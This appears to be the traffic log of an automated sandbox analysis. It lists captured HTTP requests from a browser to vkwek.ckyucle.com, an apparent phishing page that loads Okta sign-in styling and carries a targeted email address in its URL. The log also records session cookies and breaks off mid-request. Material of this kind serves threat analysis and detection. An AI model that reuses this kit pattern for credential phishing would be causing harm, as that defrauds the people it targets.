Source: global traffic	HTTP traffic detected: GET /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVYiLCJtYWMiOiJjMjc3MjYyMWI0NjU2MzIxY2M2NjRmMzU1NWJlMWY3MjhiZWJkOGQzMWIyMjMwYzdjNjZkNzY2MmVkM2VmZGM1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /2DUx/?W-crystal.begin@schulergroup.com HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjIyaWZWVjlWK2x3OHpRZTExOTYyY0E9PSIsInZhbHVlIjoiWHNialhqU2VsQU5XaEc5Z0tBTC9Xc2FJL1Y5Z2VZbHFWVHgxMWh0cFhXQTVvd3BOd2hDa0p6NzNmcXh1YUlQa3lrL3ZuYURJbUo3cXJLZkZJOWhiblIxcHIzQTFjb3lNMTNWdkVpWmJ4L1FwMmVUYU9JMVk2bGwxczhzWjJBV1ciLCJtYWMiOiJhMWUwOGM3YTg1MDZjYTE2YjM2MmFjOWZlMjZlYWE0NGVhNWZmNDRjOWJiYjIzYTEyMWZjYjA1ZWJiZTljOTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBiU3hwRWZDMmk3a0w5VVdrak1VdGc9PSIsInZhbHVlIjoiN0pGREJJMWE3UkNMVUsrRXMrYjlwSUhQeit1SFBJZlFudllCQTBydUJUNE9pNlhLQ1BVWS9TeWFsMXVjWS9NdlRqYktzbVNWTFREbVY1MDRIT28xWDMvemZmdi95QWUxMnBhMDd6YjNzYytoR2ZIL3oyZjdHSFhkNDhWcWl0MFoiLCJtYWMiOiJhYjVkOGVmOWMzMjc3OWEyOTNkMjQ2YWJjZDIxNzM0N2MzYTBiOWRlYWM2M2MyNmU4MTA5YTJkMGYyYmUyZTQyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://vkwek.ckyucle.com/2DUx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikp6bWxUaVJGcWJad3NFeGtVT1Y2QlE9PSIsInZhbHVlIjoiOTlSQXB3ektMQi9UZjNWdVRycGN0WU9GeHhmU1FpUFhGajZ0cUtwQ1lmVWc4Q2lHZG9rbHZSeEVjTWNrL2JwbEllOE5ZODFGRUY1WDhjc0NUM2NXRmN2akF1MDdiK3RiL0RsSk40NkUzS2FLb1RWc2V4K2M4UE5ubngyRFM5T3oiLCJtYWMiOiJkNjU4ZThiOGIzNWFkYmVhMWM1OTVkZTBiZGEyNzgyMmIzY2IzYWJjOTczYWYxZGI5YTczMzM2MGY4ZTc4OWRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InYxZ01pTTRXNFRrUlNONit4Zkk3YWc9PSIsInZhbHVlIjoiM0JCNUN6ckFzUGI2akx1T2U1ckJ6UWN1MVBadVo3elJYZytpK1lQV0RFTVVubmVwRHZWYjkwWk1MczBOdm1vUGJIUVRKTmxWdjFCU212dnFDNFFCTzhUT3RBdzROd3kyNkU1RWd3RFZVa0JEMVFmYWhxYVBmUlBKVytFQTlpbmIiLCJtYWMiOiIwMGIyZjU4YWRjZTlkNDA1OWM4YjY5YmVmZTQ3ZDUyZTk5OGFhNDEzNTI5NDFjZDQyODVhMzdjMmEyODViYTRjIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /12TvEGAMcd3aPS6720 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xy12R7tzrssHzef25 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /pqJEZxAGJZqUBhc85R9yzrCUwx40 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /yzBt71gp856BSdkJ4Qop47 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /78l8NmRVxJ45fjuJRst60 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /45TplGCNDXCptZb896Wyz84jpQxy69 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-64710If-Range: "28feccc0-15d9d"
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-89500If-Range: "28feccc0-15d9d"
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 